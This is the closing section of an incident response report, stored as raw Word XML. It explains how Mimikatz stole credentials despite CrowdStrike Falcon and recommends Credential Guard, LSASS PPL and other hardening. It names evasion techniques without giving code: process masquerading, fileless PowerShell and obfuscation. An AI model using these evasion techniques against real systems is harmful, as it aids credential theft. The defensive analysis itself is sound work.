          <w:bCs/>
          <w:caps/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">THE MOST SIGNIFICANT FINDING: EDR PRESENCE ≠ EDR PROTECTION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CrowdStrike Falcon was fully operational throughout the initial compromise, yet failed to prevent credential theft. The EDR detected the attack but required 112 seconds to generate an alert - 18 times slower than the 6-second attack execution. This demonstrates a critical gap between detection capabilities and prevention effectiveness.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Root Cause: Windows Credential Guard and LSASS Protected Process Light (PPL) were NOT ENABLED on workstations. Without these Windows-native protections, the EDR operated in detection-only mode for LSASS memory access, allowing Mimikatz to steal credentials before the behavioral analytics could respond.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The attacker successfully exploited five specific EDR weaknesses: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Missing LSASS protection: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Credential Guard and PPL not enabled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Behavioral analysis delay: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">112-second detection window vs 6-second attack execution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masquerading bypass: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Mimikatz as svchost.exe evaded signature detection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In-memory execution: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Fileless PowerShell attack avoided file-based scanning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Detection-only PowerShell mode: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Obfuscated commands logged but not prevented</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This incident proves that EDR solutions alone are insufficient for modern threat protection. Organizations must implement defense-in-depth strategies combining host-based protections (Credential Guard, LSASS PPL, ASR rules), application whitelisting, PowerShell Constrained Language Mode, multi-factor authentication, and network segmentation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The organization must recognize that relying solely on EDR created a false sense of security that this attack successfully exploited. Immediate action is required to enable the missing Windows-native protections that EDR depends on to function effectively.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="720"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">--- END OF REPORT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4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2026-02-15T04:54:06.215Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-15T04:54:06.216Z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